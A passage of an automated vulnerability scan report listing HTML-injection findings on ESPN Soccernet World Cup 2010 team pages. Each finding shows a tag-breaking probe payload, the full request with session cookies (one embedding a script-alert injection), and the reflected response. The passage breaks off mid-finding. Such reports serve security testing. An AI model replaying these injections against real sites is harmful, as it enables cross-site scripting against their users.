P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT
Content-Length: 81695
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players"> ...[SNIP]...
2.42. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:09 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT Content-Length: 81803 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8"> ...[SNIP]...
2.43. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/479/denmark
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT Content-Length: 82130 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat"> ...[SNIP]...
2.44. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/479/denmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT Content-Length: 82238 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395"> ...[SNIP]...
2.45. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/481/germany
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT Content-Length: 80545 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.46. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/481/germany
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT Content-Length: 80653 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197"> ...[SNIP]...
2.47. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/482/portugal
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT Content-Length: 81605 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat"> ...[SNIP]...
2.48. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/482/portugal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT Content-Length: 81713 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668"> ...[SNIP]...
2.49. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4860/north-korea
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
